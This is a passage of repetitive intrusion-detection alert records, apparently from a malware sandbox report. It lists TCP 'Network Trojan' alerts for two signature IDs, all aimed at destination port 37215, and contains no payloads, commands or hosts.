              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758606
              SID:2835222
              Source Port:60218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027815
              SID:2835222
              Source Port:41970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040837
              SID:2829579
              Source Port:37702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376520
              SID:2835222
              Source Port:57968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219956
              SID:2829579
              Source Port:60648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456575
              SID:2829579
              Source Port:49470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609797
              SID:2835222
              Source Port:58734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165159
              SID:2835222
              Source Port:45920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554102
              SID:2829579
              Source Port:43584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987243
              SID:2835222
              Source Port:41080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524386
              SID:2835222
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604475
              SID:2829579
              Source Port:58902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834362
              SID:2829579
              Source Port:49858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318412
              SID:2829579
              Source Port:53772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800545
              SID:2835222
              Source Port:48490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011317
              SID:2835222
              Source Port:56228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476159
              SID:2835222
              Source Port:56928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758894
              SID:2829579
              Source Port:45250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568782
              SID:2829579
              Source Port:47478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941032
              SID:2829579
              Source Port:60584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011845
              SID:2835222
              Source Port:37256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438917
              SID:2835222
              Source Port:47022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074313
              SID:2835222
              Source Port:54082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402844
              SID:2835222
              Source Port:50782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401335
              SID:2835222
              Source Port:38616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506249
              SID:2835222
              Source Port:47276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454507
              SID:2829579
              Source Port:55378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437506
              SID:2829579
              Source Port:46518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152923
              SID:2835222
              Source Port:41498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610843
              SID:2829579
              Source Port:43030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323966
              SID:2829579
              Source Port:36332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358349
              SID:2835222
              Source Port:37638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243280
              SID:2835222
              Source Port:50324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.933522
              SID:2835222
              Source Port:55486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.197711
              SID:2829579
              Source Port:36192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726931
              SID:2829579
              Source Port:59232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670576
              SID:2829579
              Source Port:49704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476213
              SID:2835222
              Source Port:60316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458032
              SID:2835222
              Source Port:60278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092593
              SID:2835222
              Source Port:35364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110876
              SID:2829579
              Source Port:53234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152754
              SID:2835222
              Source Port:46280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373919
              SID:2835222
              Source Port:43860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509419
              SID:2835222
              Source Port:43772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.679053
              SID:2835222
              Source Port:60752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754428
              SID:2835222
              Source Port:54348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107196
              SID:2835222
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294622
              SID:2835222
              Source Port:35392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803501
              SID:2835222
              Source Port:37966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887289
              SID:2829579
              Source Port:59290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110574
              SID:2829579
              Source Port:41206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353315
              SID:2835222
              Source Port:58330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803198
              SID:2835222
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194574
              SID:2829579
              Source Port:54130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307917
              SID:2829579
              Source Port:54806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216314
              SID:2829579
              Source Port:47624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227792
              SID:2835222
              Source Port:39304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309947
              SID:2829579
              Source Port:55508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422430
              SID:2829579
              Source Port:47642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727971
              SID:2835222
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316240
              SID:2829579
              Source Port:42960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308873
              SID:2835222
              Source Port:37774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755802
              SID:2835222
              Source Port:58722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405015
              SID:2829579
              Source Port:57372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.232136
              SID:2835222
              Source Port:41728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454070
              SID:2835222
              Source Port:58096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093255
              SID:2829579
              Source Port:47840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870558
              SID:2829579
              Source Port:53602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711833
              SID:2835222
              Source Port:41924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783823
              SID:2835222
              Source Port:38224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487941
              SID:2835222
              Source Port:56432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787361
              SID:2829579
              Source Port:54786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914322
              SID:2829579
              Source Port:34332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838244
              SID:2835222
              Source Port:59306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423181
              SID:2835222
              Source Port:53808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973640
              SID:2829579
              Source Port:41226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403322
              SID:2829579
              Source Port:59912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056296
              SID:2829579
              Source Port:59116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262602
              SID:2835222
              Source Port:36178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092388
              SID:2835222
              Source Port:48634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093206
              SID:2829579
              Source Port:50048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913466
              SID:2835222
              Source Port:42464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.080046
              SID:2829579
              Source Port:49164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160662
              SID:2835222
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028014
              SID:2835222
              Source Port:59448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.131208
              SID:2835222
              Source Port:57980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295028
              SID:2829579
              Source Port:47708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377939
              SID:2835222
              Source Port:38388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609607
              SID:2835222
              Source Port:55480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307972
              SID:2835222
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555155
              SID:2829579
              Source Port:56110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127869
              SID:2829579
              Source Port:55874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175478
              SID:2829579
              Source Port:50472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474737
              SID:2829579
              Source Port:48230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914132
              SID:2835222
              Source Port:37294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727768
              SID:2829579
              Source Port:38264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823507
              SID:2829579
              Source Port:48128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832780
              SID:2835222
              Source Port:41192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728502
              SID:2835222
              Source Port:34910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151300
              SID:2829579
              Source Port:59456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176092
              SID:2829579
              Source Port:43622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656729
              SID:2835222
              Source Port:59756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659003
              SID:2829579
              Source Port:39500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754652
              SID:2835222
              Source Port:42438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528349
              SID:2829579
              Source Port:53514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349673
              SID:2835222
              Source Port:58522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886610
              SID:2835222
              Source Port:56154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354056
              SID:2829579
              Source Port:60692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784431
              SID:2829579
              Source Port:42706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612768
              SID:2835222
              Source Port:34430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867468
              SID:2829579
              Source Port:39996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198959
              SID:2829579
              Source Port:41724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711772
              SID:2835222
              Source Port:42434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974634
              SID:2835222
              Source Port:60044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478035
              SID:2835222
              Source Port:35536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885786
              SID:2835222
              Source Port:38724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274137
              SID:2835222
              Source Port:43766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842528
              SID:2829579
              Source Port:37326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941203
              SID:2835222
              Source Port:34544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013829
              SID:2829579
              Source Port:47684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043074
              SID:2829579
              Source Port:58444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272036
              SID:2829579
              Source Port:46302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911539
              SID:2835222
              Source Port:40052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273144
              SID:2835222
              Source Port:36602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100128
              SID:2829579
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170094
              SID:2829579
              Source Port:34372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403139
              SID:2835222
              Source Port:36500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215908
              SID:2835222
              Source Port:45020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253652
              SID:2829579
              Source Port:34792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195820
              SID:2829579
              Source Port:59942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308071
              SID:2829579
              Source Port:55394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094845
              SID:2829579
              Source Port:52034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756208
              SID:2835222
              Source Port:49494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347187
              SID:2835222
              Source Port:46274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227544
              SID:2835222
              Source Port:47694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042191
              SID:2829579
              Source Port:60824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174606
              SID:2829579
              Source Port:36048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710604
              SID:2829579
              Source Port:42986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546537
              SID:2835222
              Source Port:32834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552986
              SID:2835222
              Source Port:55280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697511
              SID:2835222
              Source Port:56726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173998
              SID:2835222
              Source Port:48398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214315
              SID:2835222
              Source Port:57274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403687
              SID:2835222
              Source Port:58202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.269095
              SID:2829579
              Source Port:33938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302815
              SID:2829579
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710760
              SID:2829579
              Source Port:40084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130720
              SID:2835222
              Source Port:60914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417599
              SID:2835222
              Source Port:45194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609549
              SID:2829579
              Source Port:41428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213899
              SID:2829579
              Source Port:58158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350335
              SID:2829579
              Source Port:47176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935597
              SID:2829579
              Source Port:33934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787718
              SID:2835222
              Source Port:60436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452956
              SID:2829579
              Source Port:38396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614838
              SID:2835222
              Source Port:37656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165568
              SID:2829579
              Source Port:45932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.319916
              SID:2835222
              Source Port:59616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438975
              SID:2835222
              Source Port:35912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694886
              SID:2835222
              Source Port:40984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155609
              SID:2829579
              Source Port:37400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273759
              SID:2829579
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612465
              SID:2829579
              Source Port:34166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091563
              SID:2829579
              Source Port:60740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102199
              SID:2829579
              Source Port:46004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.225114
              SID:2835222
              Source Port:50056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931531
              SID:2835222
              Source Port:44224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404102
              SID:2829579
              Source Port:41866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085687
              SID:2829579
              Source Port:54238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246528
              SID:2829579
              Source Port:45750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707785
              SID:2829579
              Source Port:42292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085423
              SID:2829579
              Source Port:47982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028887
              SID:2835222
              Source Port:58042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677224
              SID:2829579
              Source Port:40792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094596
              SID:2835222
              Source Port:46862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218348
              SID:2829579
              Source Port:34888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805219
              SID:2829579
              Source Port:36950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275934
              SID:2829579
              Source Port:59888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294930
              SID:2829579
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821566
              SID:2835222
              Source Port:43394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026409
              SID:2829579
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784162
              SID:2829579
              Source Port:46558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670732
              SID:2829579
              Source Port:42568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402624
              SID:2829579
              Source Port:52422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085208
              SID:2829579
              Source Port:51824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297480
              SID:2829579
              Source Port:47646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416094
              SID:2835222
              Source Port:52654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781805
              SID:2835222
              Source Port:45018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026050
              SID:2829579
              Source Port:42280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127272
              SID:2829579
              Source Port:38212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042478
              SID:2835222
              Source Port:55176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525735
              SID:2835222
              Source Port:41812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408142
              SID:2829579
              Source Port:49120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195300
              SID:2835222
              Source Port:40482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129512
              SID:2829579
              Source Port:59082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786520
              SID:2835222
              Source Port:34854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340422
              SID:2829579
              Source Port:36180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
